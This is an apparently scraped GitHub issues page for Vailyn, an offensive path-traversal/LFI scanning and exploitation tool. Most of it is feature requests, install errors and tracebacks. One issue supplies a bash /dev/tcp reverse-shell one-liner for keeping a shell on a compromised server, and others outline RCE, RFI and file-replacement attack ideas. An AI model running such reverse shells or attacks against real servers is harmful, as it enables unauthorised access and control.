vainlystrain / vailyn Goto Github PK
View Code? Open in Web Editor NEWA phased, evasive Path Traversal + LFI scanning & exploitation tool in Python
License: GNU General Public License v3.0
A phased, evasive Path Traversal + LFI scanning & exploitation tool in Python
License: GNU General Public License v3.0
When downloading files, extract the leaked data from the rest of the HTML document.
The attack routines are way too complex, and contain duplicate code. Clean them up by splitting them into several smaller functions, and regrouping similar behaviour in 1 function.
In the current version, every RCE technique is probed at every run. Add a choice prompt (like the one for payloads) that lets the user select which techniques to use.
Category
Installation issue on Kali
Describe the bug
Installation fails due to pyqt5 dependency
To Reproduce
pip install -r requirements.txt
root@kali:/opt/Vailyn# pip install -r requirements.txt
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Collecting treelib
Using cached treelib-1.6.1.tar.gz (24 kB)
Requirement already satisfied: requests in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 2)) (2.18.4)
Requirement already satisfied: argparse in /usr/lib/python2.7 (from -r requirements.txt (line 3)) (1.2.1)
Requirement already satisfied: colorama in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 4)) (0.4.3)
ERROR: Could not find a version that satisfies the requirement PyQt5 (from -r requirements.txt (line 5)) (from versions: none)
ERROR: No matching distribution found for PyQt5 (from -r requirements.txt (line 5))
Expected behaviour
Clean installation is expected.
Desktop
Distributor ID: Kali
Description: Kali GNU/Linux Rolling
Release: 2020.3
Codename: kali-rolling
Linux kali 5.4.0-kali4-amd64 #1 SMP Debian 5.4.19-1kali1 (2020-02-17) x86_64 GNU/Linux
Provide more output in the RCE module, both for CLI and GUI.
Make it easier to switch the payload used for RCE by saving it in one variable.
Remove hardcoded depth from RCE and replace it by the depth used in the leak phase.
The RCE module does not scan for null bytes. This will be fixed together with #7 .
Add support for RFI scanning & exploitation.
In Phase 1, it is possible to do a targeted attack. If you know file.php
is just above the inclusion folder, you can specify -d 1 x x
to greatly reduce the attack duration.
However, if the file sits 3 levels above, Vailyn will still check level 1 and 2.
Extend the targeted attack feature with a new argument --targeted
. If provided, only check the exact Phase 1 depth.
If the target server is only running on 1 thread, and a reverse shell is spawned, the server doesn't accept HTTP connections any more, leading to a DoS scenario. If this happens in your operation, perform the following steps:
bash -i >& /dev/tcp/{YOUR IP}/{NEW PORT} 0>&1 & exit
This will spawn a new shell on your second port and terminate the first, and the server will accept connections again.
Add an option to scan for absolute paths, instead of relative ones.
root@kali:~/Vailyn# python3 Vailyn -h
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/dbus/bus.py", line 177, in activate_name_owner
return self.get_name_owner(bus_name)
File "/usr/lib/python3/dist-packages/dbus/bus.py", line 361, in get_name_owner
return self.call_blocking(BUS_DAEMON_NAME, BUS_DAEMON_PATH,
File "/usr/lib/python3/dist-packages/dbus/connection.py", line 652, in call_blocking
reply_message = self.send_message_with_reply_and_block(
dbus.exceptions.DBusException: org.freedesktop.DBus.Error.NameHasNoOwner: Could not get owner of name 'org.freedesktop.Notifications': no such name
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/root/Vailyn/Vailyn", line 113, in
notify2.init("Vailyn")
File "/usr/local/lib/python3.9/dist-packages/notify2.py", line 102, in init
dbus_obj = bus.get_object('org.freedesktop.Notifications',
File "/usr/lib/python3/dist-packages/dbus/bus.py", line 241, in get_object
return self.ProxyObjectClass(self, bus_name, object_path,
File "/usr/lib/python3/dist-packages/dbus/proxies.py", line 250, in init
self._named_service = conn.activate_name_owner(bus_name)
File "/usr/lib/python3/dist-packages/dbus/bus.py", line 182, in activate_name_owner
self.start_service_by_name(bus_name)
File "/usr/lib/python3/dist-packages/dbus/bus.py", line 277, in start_service_by_name
return (True, self.call_blocking(BUS_DAEMON_NAME, BUS_DAEMON_PATH,
File "/usr/lib/python3/dist-packages/dbus/connection.py", line 652, in call_blocking
reply_message = self.send_message_with_reply_and_block(
dbus.exceptions.DBusException: org.freedesktop.DBus.Error.ServiceUnknown: The name org.freedesktop.Notifications was not provided by any .service files
Add a possibility to configure the crawler to only scan for a subset of vectors (instead of all).
Greetings!
I started the first run about 25 minutes back. The % loading is at 13%. This is a query attack run (-a 1) with a very short file & directory list (<10 entries).
Thanks.
In Vailyn 2.3, a severe memory issue has been resolved, causing systems to run out of memory with big directory dictionaries. Users are advised to update to the latest version, especially when attacking with huge dictionaries. More improvements towards dictionary handling planned in the future.
Add an option to config.py
that lets the user specify a custom payload for the RCE module.
Is your feature request related to a problem? Please describe.
In Vailyn 1.5.1, attacking through Tor is only possible for Linux, because the command used to start the service (systemctl), is not available on Windows.
Describe the solution you'd like
Make Tor piping available for Windows-based systems.
Additional context
Since I don't have a Windows machine (and VM installations broken), I will need a hand for implementing this.
Before trying to spawn a full bash shell, confirm that RCE works using $_GET["cmd"].
Category
False Positive | False Negative
Describe the bug
The requests library which this project uses has some strange behaviours, which leads to the POST attack (-a 4) not working correctly.
The issue:
When you use a data dictionary for the POST request, requests percent-encodes the POST data. This leads that more complex evasion payloads fail, even if they should work. Also, the output of the scanner will be wrong. Let's say the server is vulnerable to ..%252f. Then, when Vailyn scans for ..%2f, it is detected as vulnerable, since requests transforms it into %252f. However, ..%2f will be shown as successful, while the real %252f test won't be.
There have been several ways to fix that in the past - none of them worked in this case.
The first way I have tried to fix it is using prepared requests, and manually setting the body afterwards. The second way was that I used a string for the data argument, instead of a dict. However, both tries resulted in the scanner finding nothing at all, despite a vulnerability being present.
If anyone reading this knows a fix: I'd really appreciate your help!
To Reproduce
Steps to reproduce the behaviour:
Expected behaviour
Vailyn should output the vulnerability, and the correct payload.
Desktop (please complete the following information):
Add an option to exploit a path traversal in an upload routine, in order to replace a legitimate server file by a version containing a user-specified payload.
Redirect the spawned subprocess to /dev/null, hiding the GUI output in the main Vailyn terminal.
Category
| Program Crash |
Describe the bug
The program gives the error:
โโ# python3.8 Vailyn
Traceback (most recent call last):
File "Vailyn", line 40, in
from PyQt5.QtCore import Qt
ModuleNotFoundError: No module named 'PyQt5.sip'
I have installed all required modules, yet get above error.
To Reproduce
Steps to reproduce the behaviour:
Expected behaviour
The program to run.
Screenshots
If applicable, add screenshots to help explain your problem.
Desktop (please complete the following information):
Additional context
Add any other context about the problem here.
The example commands includes dicts/files and dicts/dirs as the wordlists to use.
They are not included on the repo, are we supposed to get them elsewhere or create them? Seems strange that the one thing needed to make the tool work is missing from the repo. dirs2 and files2 are included but they are too limited to be effective. Maybe I'm misunderstanding the intention behind this project.
I would suggest adding to the wiki some mention of the wordlists to clarify. I'm shocked I'm the first person to ask this.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.